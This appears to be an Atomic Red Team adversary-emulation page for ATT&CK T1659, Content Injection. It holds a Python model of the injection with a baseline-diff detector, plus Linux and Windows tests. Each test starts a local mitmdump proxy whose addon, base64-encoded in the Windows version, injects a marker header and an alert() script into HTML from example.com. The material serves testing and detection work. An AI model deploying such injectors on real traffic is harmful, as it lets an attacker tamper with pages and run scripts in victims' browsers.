
T1659

Content Injection

Description from ATT&CK

Adversaries may gain access and continuously communicate with victims by injecting malicious content into systems through online network traffic. Rather than luring victims to malicious payloads hosted on a compromised website (i.e., Drive-by Target followed by Drive-by Compromise), adversaries may initially access victims through compromised data-transfer channels where they can manipulate traffic and/or inject their own content. These compromised online network channels may also be used to deliver additional payloads (i.e., Ingress Tool Transfer) and other data to already compromised systems.(Citation: ESET MoustachedBouncer)

Adversaries may inject content to victim systems in various ways, including:

  • From the middle, where the adversary is in-between legitimate online client-server communications (Note: this is similar to but distinct from Adversary-in-the-Middle, which describes AiTM activity solely within an enterprise environment) (Citation: Kaspersky Encyclopedia MiTM)
  • From the side, where malicious content is injected and races to the client as a fake response to requests of a legitimate online server (Citation: Kaspersky ManOnTheSide)

Content injection is often the result of compromised upstream communication channels, for example at the level of an internet service provider (ISP) as is the case with "lawful interception."(Citation: Kaspersky ManOnTheSide)(Citation: ESET MoustachedBouncer)(Citation: EFF China GitHub Attack)
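The injection-from-the-middle case above, worked through as an added example (this is not Atomic Red Team or mitmproxy code): it reproduces the logic of the mitmdump addon used in Atomic Test #1 as a pure function over a constructed HTTP response, with no network or proxy involved, and pairs it with the check a defender or test harness would run, comparing a response fetched over a trusted path with one fetched over the suspect path and reporting the headers and inline scripts that only the suspect copy carries. The example.com body and the JSON response are constructed stand-ins, not captures, and the `HttpResponse` class and function names are this example's own.

```python
"""Content injection from the middle, modelled as a pure transform, plus a
baseline-diff check for it.

Added example for this page; not Atomic Red Team or mitmproxy code. It
reproduces the logic of the mitmdump addon in Atomic Test #1 on a constructed
HTTP response (no network, no proxy), then shows the check a defender or test
harness would run: fetch the same URL over a trusted path and over the suspect
path, and report headers and inline scripts that appear only on the suspect path.
"""
import re
from dataclasses import dataclass


@dataclass
class HttpResponse:
    status: int
    headers: dict   # header names are stored lowercased
    body: str


# Same marker header and payload the page's addon injects.
MARKER_HEADER = ("x-atomic", "T1659")
INJECTED_SCRIPT = '<script>alert("Atomic T1659 Injection")</script>'
SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.I | re.S)


def inject(resp: HttpResponse) -> HttpResponse:
    """Attacker side: what the proxy does to each response.

    Only HTML is touched, so API/JSON traffic passes through unchanged and the
    victim sees nothing odd there. Content-Length is recomputed because a body
    that grows without it is truncated by the client (mitmproxy does this when
    you assign flow.response.text; a hand-rolled injector must do it itself).
    """
    if "text/html" not in resp.headers.get("content-type", ""):
        return resp
    headers = dict(resp.headers)
    headers[MARKER_HEADER[0]] = MARKER_HEADER[1]
    body = resp.body.replace("</body>", INJECTED_SCRIPT + "</body>", 1)
    headers["content-length"] = str(len(body.encode("utf-8")))
    return HttpResponse(resp.status, headers, body)


def diff_responses(baseline: HttpResponse, observed: HttpResponse) -> dict:
    """Defender side: compare a response fetched over a trusted path with one
    fetched over the suspect path and report what only the latter contains."""
    added_headers = {k: v for k, v in observed.headers.items()
                     if baseline.headers.get(k) != v}
    baseline_scripts = set(SCRIPT_RE.findall(baseline.body))
    added_scripts = [s for s in SCRIPT_RE.findall(observed.body)
                     if s not in baseline_scripts]
    return {
        "added_headers": added_headers,
        "added_scripts": added_scripts,
        "body_changed": observed.body != baseline.body,
    }


def make_html_response() -> HttpResponse:
    """Constructed stand-in for the page example.com serves (not a capture)."""
    body = ("<!doctype html><html><head><title>Example Domain</title></head>"
            "<body><div><h1>Example Domain</h1></div></body></html>")
    return HttpResponse(200, {"content-type": "text/html; charset=UTF-8",
                              "content-length": str(len(body))}, body)


def make_json_response() -> HttpResponse:
    """Constructed non-HTML response, to exercise the content-type guard."""
    body = '{"status":"ok"}'
    return HttpResponse(200, {"content-type": "application/json",
                              "content-length": str(len(body))}, body)


def run_check(resp: HttpResponse) -> dict:
    """Push resp through the injector and diff the result against the original."""
    return diff_responses(resp, inject(resp))


if __name__ == "__main__":
    for name, resp in (("html", make_html_response()),
                       ("json", make_json_response())):
        report = run_check(resp)
        print(name, "body_changed=%s" % report["body_changed"],
              "added_headers=%s" % report["added_headers"],
              "added_scripts=%s" % report["added_scripts"])
```

The diff is what the two Atomic tests below approximate with `grep` and `Select-String`: they know the marker to look for, whereas `diff_responses` reports any header or inline script the trusted copy lacks, so it also catches injected content whose text you do not know in advance. The recomputed Content-Length is the detail most hand-written injectors get wrong; a stale length silently truncates the page and the injected script never reaches the parser.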


Atomic Tests

Atomic Test #1: MITM Proxy Injection

Verify the injected header and HTML content through a mitmdump proxy that the prerequisite commands start in the background. The request deliberately targets plain http://example.com: curl's -k only matters if the URL is changed to https, where it makes curl accept the certificate mitmproxy generates; a client that validates certificates would only be injectable over TLS if the proxy's CA were trusted.

Supported Platforms: macOS, Linux

auto_generated_guid: 9b360eaf-c778-4f07-a6e7-895c4f01ac1c

Attack Commands: Run with bash!

curl -skI --proxy http://127.0.0.1:8080 http://example.com > /tmp/curl_out.txt
grep "X-Atomic" /tmp/curl_out.txt || (cat /tmp/curl_out.txt && exit 1)
curl -sk --proxy http://127.0.0.1:8080 http://example.com > /tmp/atomic_t1659_page.html
grep -q "Atomic T1659 Injection" /tmp/atomic_t1659_page.html || (head -20 /tmp/atomic_t1659_page.html; exit 1)

Cleanup Commands

rm -rf /tmp/atomic_t1659_inject.py
rm -rf /tmp/atomic_t1659.log
rm -rf /tmp/curl_out.txt
rm -rf /tmp/atomic_t1659_page.html
pkill -f mitmdump || true

Dependencies: Run with bash!

Description: python3 must be installed
Check Prereq Commands
command -v python3
Get Prereq Commands
brew install python3 || (sudo apt-get update && sudo apt-get install -y python3) || sudo yum install -y python3
Description: curl must be installed
Check Prereq Commands
command -v curl
Get Prereq Commands
brew install curl || (sudo apt-get update && sudo apt-get install -y curl) || sudo yum install -y curl
Description: pipx must be installed
Check Prereq Commands
pipx --version
Get Prereq Commands
brew install pipx || (sudo apt-get update && sudo apt-get install -y pipx) || sudo yum install -y pipx
Description: mitmproxy must be installed
Check Prereq Commands
pipx list | grep mitmproxy
Get Prereq Commands
pipx install mitmproxy || brew install mitmproxy
Description: mitmdump must be running on port 8080
Check Prereq Commands
lsof -i tcp:8080 | grep mitmdump
Get Prereq Commands
printf "from mitmproxy import http\ndef response(flow: http.HTTPFlow):\n    if 'text/html' in flow.response.headers.get('content-type',''):\n        flow.response.headers['X-Atomic']='T1659'\n        flow.response.text = flow.response.text.replace('</body>', '<script>alert(\"Atomic T1659 Injection\")</script></body>')" > /tmp/atomic_t1659_inject.py
($HOME/.local/bin/mitmdump -s /tmp/atomic_t1659_inject.py -p 8080 > /tmp/atomic_t1659.log 2>&1 &)
sleep 5
lsof -i tcp:8080 | grep mitmdump || (cat /tmp/atomic_t1659.log; exit 1)

Atomic Test #2: MITM Proxy Injection (Windows)

Verify the injected header and HTML content through a mitmdump proxy that the prerequisite commands start in the background.

Supported Platforms: Windows

auto_generated_guid: dcc2ca85-a21c-43a4-acc7-7314d4e5891c

Attack Commands: Run with powershell!

curl.exe -skI --proxy http://127.0.0.1:8080 http://example.com | Tee-Object -FilePath "$env:TEMP\curl_out.txt"
if (-not (Select-String -Path "$env:TEMP\curl_out.txt" -Pattern "X-Atomic")) { Write-Error "Header not found"; exit 1 }
$OutPath = "$env:TEMP\atomic_t1659_page.html"
curl.exe -sk --proxy http://127.0.0.1:8080 http://example.com | Out-File -FilePath $OutPath -Encoding utf8
$Content = Get-Content -Path $OutPath -Raw
if ($Content -notmatch "Atomic T1659 Injection") { exit 1 }

Cleanup Commands

Stop-Process -Name "mitmdump" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\atomic_t1659_inject.py" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\atomic_t1659.log" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\curl_out.txt" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\atomic_t1659_page.html" -ErrorAction SilentlyContinue

Dependencies: Run with powershell!

Description: Python must be installed
Check Prereq Commands
if (Get-Command python -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }
Get Prereq Commands
winget install --id Python.Python.3 -e
Description: curl must be installed
Check Prereq Commands
if (Get-Command curl.exe -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }
Get Prereq Commands
winget install --id cURL.cURL -e
Description: mitmproxy must be installed and in PATH
Check Prereq Commands
if (Get-Command mitmdump -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }
Get Prereq Commands
python -m pip install mitmproxy
Description: mitmdump must be running on port 8080
Check Prereq Commands
if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue | Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name -like "*mitmdump*" }) { exit 0 } else { exit 1 }
Get Prereq Commands
$code = 'ZnJvbSBtaXRtcHJveHkgaW1wb3J0IGh0dHANCmRlZiByZXNwb25zZShmbG93OiBodHRwLkhUVFBGbG93KToNCiAgICBpZiAidGV4dC9odG1sIiBpbiBmbG93LnJlc3BvbnNlLmhlYWRlcnMuZ2V0KCJjb250ZW50LXR5cGUiLCIiKToNCiAgICAgICAgZmxvdy5yZXNwb25zZS5oZWFkZXJzWyJYLUF0b21pYyJdPSJUMTY1OSINCiAgICAgICAgZmxvdy5yZXNwb25zZS50ZXh0ID0gZmxvdy5yZXNwb25zZS50ZXh0LnJlcGxhY2UoIjwvYm9keT4iLCAiPHNjcmlwdD5hbGVydCgnQXRvbWljIFQxNjU5IEluamVjdGlvbicpPC9zY3JpcHQ+PC9ib2R5PiIp'
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($code)) | Out-File -FilePath "$env:TEMP\atomic_t1659_inject.py" -Encoding ascii
Start-Process -FilePath "mitmdump" -ArgumentList @("-s", "$env:TEMP\atomic_t1659_inject.py", "-p", "8080") -RedirectStandardOutput "$env:TEMP\atomic_t1659.log" -RedirectStandardError "$env:TEMP\atomic_t1659.log" -WindowStyle Hidden
Start-Sleep -Seconds 5
if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue | Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name -like "*mitmdump*" }) { exit 0 } else { Get-Content "$env:TEMP\atomic_t1659.log"; exit 1 }

Atomic test(s) for this technique last updated: 2026-04-20 02:21:05 UTC
